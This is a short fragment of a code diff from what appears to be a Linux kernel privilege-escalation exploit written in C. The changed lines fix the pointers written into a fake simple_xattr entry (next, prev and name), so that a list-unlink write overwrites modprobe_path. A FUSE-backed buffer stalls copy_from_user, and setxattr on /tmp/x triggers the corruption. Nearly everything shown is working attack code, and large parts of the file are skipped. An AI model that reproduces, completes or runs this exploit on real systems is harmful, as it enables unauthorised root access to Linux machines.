| skipped 265 lines |
266 | 266 | | // copy_from_user blocks forever (prevents double free) |
267 | 267 | | // We don't need to change the 4th qword |
268 | 268 | | unsigned long base_address = FUSE_MEM_ADDR3 - (0x20 - 0x8); |
269 | | - | memcpy(base_address, slash_tmp, 8); |
270 | | - | memcpy(base_address + 8, modprobe_path_plus1, 8); |
| 269 | + | |
| 270 | + | // `slash_tmp` is written to next->prev which is offset 8 bytes from next |
| 271 | + | // so subtract 8 bytes to offset this |
| 272 | + | unsigned long modprobe_path_plus1_prev = *modprobe_path_plus1 - 8; |
| 273 | + | |
| 274 | + | // simple_xattr->next |
| 275 | + | memcpy(base_address, &modprobe_path_plus1_prev, 8); |
| 276 | + | // simple_xattr->prev |
| 277 | + | memcpy(base_address + 8, slash_tmp, 8); |
| 278 | + | // simple_xattr->name |
271 | 279 | | memcpy(base_address + 16, security_a, 8); |
272 | 280 | | |
| 281 | + | // This should never return |
273 | 282 | | int ret = setxattr("/tmp/x", "user.b", base_address, 0x20 - 1, 0); |
274 | | - | // This should never return |
275 | 283 | | printf("setxattr ret: %d\n", ret); |
276 | 284 | | if (ret == -1) |
277 | 285 | | { |
| skipped 121 lines |
399 | 407 | | wait(NULL); |
400 | 408 | | sleep(0x100000); |
401 | 409 | | } |
| 410 | + | |